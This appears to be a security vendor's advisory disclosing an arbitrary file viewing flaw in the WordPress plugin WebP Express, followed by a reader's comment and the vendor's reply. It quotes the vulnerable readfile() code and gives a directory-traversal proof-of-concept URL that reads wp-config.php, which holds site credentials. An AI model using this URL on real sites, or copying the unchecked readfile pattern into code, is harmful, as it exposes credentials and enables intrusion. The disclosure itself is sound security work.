A New Addition to Our Proactive Monitoring Caught an Arbitrary File Viewing Vulnerability in a WordPress Plugin in Less Than a Day
Earlier today we noted in detailing an arbitrary file viewing vulnerability that had been fixed in a WordPress plugin that in looking at the code from that we made improvement to our detection of that type of vulnerability in our proactive monitoring of changes being made to plugins to try to catch serious vulnerabilities when they are introduced in to plugin and our Plugin Security Checker. It didn’t even take a day before that improvement allowed us to spot an arbitrary file viewing vulnerability in the plugin WebP Express through that proactive monitoring. That type of vulnerability is likely to be exploited, though usually doesn’t cause website to be hacked.
This vulnerability is yet another good reason to check plugins you use through our Plugin Security Checker since it can alert you if plugins you use possibly contain a similar issue (and possibly contain a lot of other serious vulnerabilities). From there if you are a paying customer of our service you can suggest/vote for it to receive a security review that will check over that or you can order the same type of review separately.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.
Technical Details
The first code in the file /test/test-run.php will output the contents of a file specified by the GET input “stream-webp-image”:
3 4 5 | if (isset($_GET['stream-webp-image'])) { header('Content-type: image/webp'); if (@readfile($_GET['stream-webp-image']) === false) { |
Using directory traversal any file on the website can be viewed.
Proof of concept
The following proof of concept will generate a file with the contents of the WordPress configuration file.
Make sure to replace “[path to WordPress]” with the location of WordPress.
http://[path to WordPress]/wp-content/plugins/webp-express/test/test-run.php?stream-webp-image=../../../../wp-config.php
Looks like this vulnerability is closed. I tried the test, and got 404. Can you verify this with the developer?
The best way for everyone to check if vulnerabilities in WordPress plugins have been fixed is to use our service as we verify if they have been truly fixed (we often find that plugin developers believe they have fixed vulnerabilities when they haven’t). We also warn people that they are using vulnerable plugins before they have been attempted to be fixed, which is even more important.
In this case if you are trying to test it and getting a 404 with the most recent version of the plugin then you are doing something wrong.